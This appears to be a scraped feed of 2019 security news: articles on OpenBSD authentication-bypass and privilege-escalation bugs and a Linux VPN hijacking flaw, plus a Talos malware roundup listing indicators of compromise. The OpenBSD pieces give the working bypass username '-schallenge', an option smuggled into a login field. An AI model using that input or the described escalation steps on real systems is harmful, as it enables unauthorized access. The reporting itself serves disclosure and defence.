_**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-06T16:54:02", "published": "2019-12-06T16:54:02", "id": "THREATPOST:C90531BC1E0B38F400111112E4CBEF3A", "href": "https://threatpost.com/linux-bug-vpns-hijacking/150891/", "type": "threatpost", "title": "Linux Bug Opens Most VPNs to Hijacking", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:11:58", "bulletinFamily": "info", "description": "An authentication bypass and three local privilege-escalation (LPE) bugs have been uncovered in OpenBSD, the Unix-like open-source operating system known for its security protections.\n\nThe most severe of the vulnerabilities is the bypass (CVE-2019-19521), which is remotely exploitable.\n\nOpenBSD uses BSD authentication, which enables the use of passwords, S/Key challenge-and-response authentication and Yubico YubiKey tokens. In each of these cases, to perform the authentication, the string \u201c/usr/libexec/auth/login_style [-v name=value] [-s service] username class\u201d is used. If an attacker specifies the username \u201c-schallenge\u201d (or \u201c-schallenge:passwd\u201d), the authentication is automatically successful and therefore bypassed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThat said, \u201cIts real-world impact should be studied on a case-by-case basis,\u201d said Qualys, the research firm that found the bugs, in [an advisory](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.75852181.122675264.1575541632-949691503.1575541632>) issued this week. 
\u201cFor example, sshd is not exploitable thanks to its defense-in-depth mechanisms.\u201d\n\nThe other bugs include CVE-2019-19520, which allows LPE via xlock, which refuses all new server connections until a user enters a password at the keyboard; CVE-2019-19522, which allows LPE via the aforementioned authentication mechanisms S/Key and YubiKey; and CVE-2019-19519, which allows LPE via su.\n\nThe first bug exists because, \u201c/usr/X11R6/bin/xlock is installed by default and is set-group-ID \u2018auth,\u2019 not set-user-ID, which leaves an incomplete check,\u201d Qualys explained. \u201cA local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group \u2018auth.\u2019\u201d\n\nArmed with the privileges of the group \u201cauth\u201d, a local attacker can then use the second LPE bug to obtain full root privileges, if the S/Key or YubiKey authentication type is enabled.\n\n\u201c[That\u2019s because] login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group \u2018auth,\u2019\u201d Qualys said.\n\nTo exploit the issue, a local attacker with \u201cauth\u201d privileges can add an S/Key entry (a file in /etc/skey) or a YubiKey entry (two files in /var/db/yubikey) for the user \u201croot.\u201d\n\nThe last bug allows a local attacker to exploit a problem in su. \u201cSu\u201d stands for \u201csubstitute user,\u201d and is used by a computer user to execute commands with the privileges of another user account. 
When executed it invokes a shell without changing the current working directory or the user environment.\n\nIn this case, a flaw in su\u2019s -L option (\u201cLoop until a correct username and password combination is entered\u201d) allows an attacker to log in as themselves but with another user\u2019s login class.\n\n[OpenBSD](<https://threatpost.com/experts-openbsd-backdoor-allegations-almost-certainly-false-121510/74782/>) patches are available, and users should [apply them](<https://www.openbsd.org/faq/faq10.html>) to protect against attacks.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
_**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T16:06:51", "published": "2019-12-05T16:06:51", "id": "THREATPOST:4524DC4DCBB97B9FDC5E13DA68B9DD1A", "href": "https://threatpost.com/openbsd-authentication-lpe-bugs/150849/", "type": "threatpost", "title": "OpenBSD Hit with Authentication, LPE Bugs", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. 
\n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. 
\n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T12:29:45", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-xAMVGaCr10Y/XejpIO8Pn6I/AAAAAAAA16c/unhPNzJj07EjrrxxW5YJ6-_8TZOM7xlswCLcBGAsYHQ/s728-e100/openbsd-vulnerabilities-exploit.png>)\n\nOpenBSD, an open-source operating system built with security in mind, has been found vulnerable to four new high-severity security vulnerabilities, one of which is an old-school type authentication bypass vulnerability in BSD Auth 
framework. \n \nThe other three vulnerabilities are privilege escalation issues that could allow local users or malicious software to gain privileges of an auth group, root, as well as of other users, respectively. \n \nThe vulnerabilities were discovered and reported by Qualys Research Labs earlier this week, in response to which OpenBSD developers released security patches for [OpenBSD 6.5](<https://www.openbsd.org/errata65.html>) and [OpenBSD 6.6](<https://www.openbsd.org/errata66.html>) just yesterday\u2014that's in less than 40 hours. \n\n\n \nHere's a brief explanation of all four security vulnerabilities in OpenBSD\u2014a free and open-source BSD-based Unix-like operating system\u2014along with their assigned CVE identifiers \n \n\n\n## OpenBSD Authentication Bypass (CVE-2019-19521)\n\n \nThe authentication bypass vulnerability resides in the way OpenBSD's authentication framework parses the username supplied by a user while logging in through smtpd, ldapd, radiusd, su, or sshd services. \n \nUsing this flaw, a remote attacker can successfully access vulnerable services with any password just by entering the username as \"-schallenge\" or \"-schallenge: passwd,\" and it works because a hyphen (-) before username tricks OpenBSD into interpreting the value as a command-line option and not as a username. \n \n\n\n[](<https://1.bp.blogspot.com/-3a_vcS24nA0/Xejx3v-dBfI/AAAAAAAA160/385L0Ra7enwKiC_o-sepWSKLhqojYWWgwCLcBGAsYHQ/s728-e100/openbsd-vulnerabilities.png>)\n\n \nHere, OpenBSD's authentication framework interprets \"-schallenge\" as \"-s challenge,\" which forces the system into silently ignoring the challenge protocol that eventually bypasses the authentication automatically. \n \n\"If an attacker specifies a username of the form '-option', they can influence the behavior of the authentication program in unexpected ways,\" the advisory said. 
\n \nAccording to the researchers, this vulnerability is practically exploitable in smtpd, ldapd, and radiusd, but not in sshd or su due to their defense-in-depth mechanisms that hang the connection even after successful authentication bypass. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nHowever, one can still remotely exploit the flaw against sshd to determine whether an OpenBSD system is vulnerable to CVE-2019-19521 or not. \n \n\n\n## OpenBSD Local Privilege Escalation Flaws\n\n \n\n\n[](<https://1.bp.blogspot.com/-NNkUYtOsDJk/XejxdnizTaI/AAAAAAAA16o/NpxAjRBWNTk1mqjFEecfaYi0s-aKIhQZACLcBGAsYHQ/s728-e100/hacking-openbsd.png>)\n\n \nAs described above, the other OpenBSD vulnerabilities are local privilege escalation issues as briefly explained below: \n \n \n\n\n * **CVE-2019-19520:** Due to the mishandling of environment-provided paths used in dlopen(), xlock, which comes installed by default on OpenBSD, could allow local attackers to escalate privileges to 'auth' group.\n * **CVE-2019-19522:** Due to incorrect operation of authorization mechanisms via \"S/Key\" and \"YubiKey,\" which is a non-default configuration, a local attacker with 'auth' group permission can gain full privileges of the root user.\n * **CVE-2019-19519:** Due to a logical error in one of the su's primary functions, a local attacker can achieve any user's login class, often excluding root, by exploiting su's -L option.\n \n \nQualys researchers have also released [proof-of-concept exploits](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.58244398.587934852.1575530822-682141427.1570559125>) for each vulnerability in its advisory. \n \nSince patches for all four security vulnerabilities are now available, affected OpenBSD users are recommended to install patches using the syspatch mechanism. \n\n\nHave something to say about this article? 
Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-12-05T12:02:57", "published": "2019-12-05T11:31:00", "id": "THN:46888CC4F1109D706C6033E851E731A9", "href": "https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html", "type": "thn", "title": "Severe Auth Bypass and Priv-Esc Vulnerabilities Disclosed in OpenBSD", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-06T20:48:42", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 29 and Dec. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. 
An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.NetWire-7428720-1 | Malware | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Ransomware.Cerber-7419509-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Trojan.LokiBot-7420275-1 | Trojan | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents attached to spam emails. \nWin.Dropper.Gh0stRAT-7414189-0 | Dropper | Gh0stRAT is a well-known family of RATs designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. 
\nWin.Trojan.Zbot-7414153-0 | Trojan | Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nDoc.Downloader.Emotet-7413880-1 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. \nWin.Dropper.Tofsee-7431752-0 | Dropper | Tofsee is multi-purpose malware that features several modules that send spam messages, conduct click fraud, mine cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Downloader.Phorpiex-7428338-0 | Downloader | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.NetWire-7428720-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 14 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKLM ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} \nValue Name: StubPath ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\<random guid>` | 16 \n`imDfesUY` | 13 \n`xtWSWREb` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`cobroserfinansa[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Install` | 15 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%APPDATA%\\Install\\winlogon.exe` | 14 \n`%TEMP%\\7176.dmp` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n`%TEMP%\\7134_appcompat.txt` | 1 \n \n#### File Hashes\n\n` 038157ed389233fc4aae039df0806789f2c92b6e3947f36bc8f086ae16a7fd4e 182dadc51371a709b901f1de489a52ff7295749427a8cf9d112358a605e2ed6d 33d4c44c967c9ab53f3d04b0d11ac38f9fbc3f9d16e65cca170bd8c937589038 3cf7e6a7776e15f8c01bde5788e5e7dbbe25beb37e977abe38b3b4cb256c3ec3 527ff73f2e6d99bbcc7fa02804ab7380e2fe12689b70bb1b0840ac1b02331a93 5aa45dcf729d53a3fc6e5d02980835fe78f3f7b7ae262b8aebf2edb6abb59bc4 5f86aa7181604fadc92f1a976fdfff892cd9b515e59939d93941907a35762888 6485a616654adee2d573a983c687a8d8ea3d126dfbf86df3a065c5e7846bd57b 7746199aba6ad47bf92515db686f3a5e2accbdb2b7f480ac2af1e2c5c377a8eb 79aa89119d9e26dc366a7af72d47c323168d2ad881bca31e9075a41f5ce081f2 905b2347215e7ce0f02f8e7274941982c56c1b817fbfd4b9eaf97d2a65f6146d 91856d29ac1f9720917a40e5533c7dacf528b25acfb5a82a00f6882b053c9b5a b18a45a4345f442efcc02d6efb9110b9e35bb98fac4613c83a39fecbee78aaa4 d26438798f502364eea85bbf2804165d0709b90833ddf4512f95ac77f881edaf de8be762d85eb4014992a174acd115de70b89884d21933d7e972e6d4972904fe def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa e0acbefe824d29143e303ba8596d1436150bf1ad7ec533b56e4ae2b1bafcf07f ea34a08deaac08c7f79e6cd2e94a74ad5b0c95dec43f81e0a218d957088b8f10 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-A71_xnIISqo/XeqM2bcnfDI/AAAAAAAAC8U/10U7Bp8vnh0OPPzEdrzVimUVUDijT6k9ACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mO63cFGuGWk/XeqM6B4wP5I/AAAAAAAAC8Y/D0XOfx3jnZkD7QkmWbImdcnFLyc1XagjACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7419509-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 12 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_01 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_00 ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue 
Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ctfmon ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 12 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`216[.]239[.]34[.]21` | 2 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 12 \n`%System32%\\Tasks\\dnscacheugc` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dnscacheugc.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\dnscacheugc.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\bootcfg.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\bootcfg.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vssadmin.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\vssadmin.exe` | 1 \n`%System32%\\Tasks\\vssadmin` | 1 \n`%System32%\\Tasks\\bootcfg` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ctfmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ctfmon.exe` | 1 \n`%System32%\\Tasks\\ctfmon` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\resmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\resmon.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\newdev.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\newdev.exe` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\mfpmp.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\mfpmp.exe` | 1 \n`%System32%\\Tasks\\javaw` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\javaw.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\javaw.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TCPSVCS.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\TCPSVCS.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0e1509af88618c8cb273196c4213e26c2219c3a1fba9ed8c51a22d871e316ccc 1d07399e5b31727fc4dadba07d062f7eff6864e33f17fb1a65f71b9b41b61282 
34a0f0bc799b5fd0cf9a89bce7d2ca2da158cf22940212b5c09fb1ec64bc9b65 4a60b63273210c8ebc4e6d07fba9b331011f852f4f5c1b5b1ae7ab5aa7df0f03 8a6c828f54dc34e260698e0347cce9e62d8fbc773e265c39c63e812201533724 8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5 b590d46794fad9c62040ce7941cf775282d1939c45267ec955e9be6ee8dd092a b8058ef9c3394ce2ea9318b06d6cf01080a0ad4ce87ee1cff78e57373192603e bbd6aadc606953b27f5592a2da7909949616b81b4f767ded89119644a71d2dd7 c8af6329fcfdfd4f9df33f2f4f59fb958e2416eebe8d78ab1444e763cf04d08c ce2b0b2037810060edbf86fc7ac78c5e0d4771b79181e39718498b02195e3642 efda569c35853456630d1e2fa27973aeb6386338f163ca0f60e3fbb4643a5b87 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lx6S7pKbz6Q/XeqOUZ3VHqI/AAAAAAAAC8o/cyN6FoqfhAgw5jQiPi349NHl0DvQpTvrwCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KERDNEosGOE/XeqOYBMYHHI/AAAAAAAAC8s/j8nmlt4BEZs4Bg_I5zMSYeV7w9qtOb8twCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.LokiBot-7420275-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 17 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE \nValue Name: LastDetectionTime ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION\\OPTIONS ` | 2 
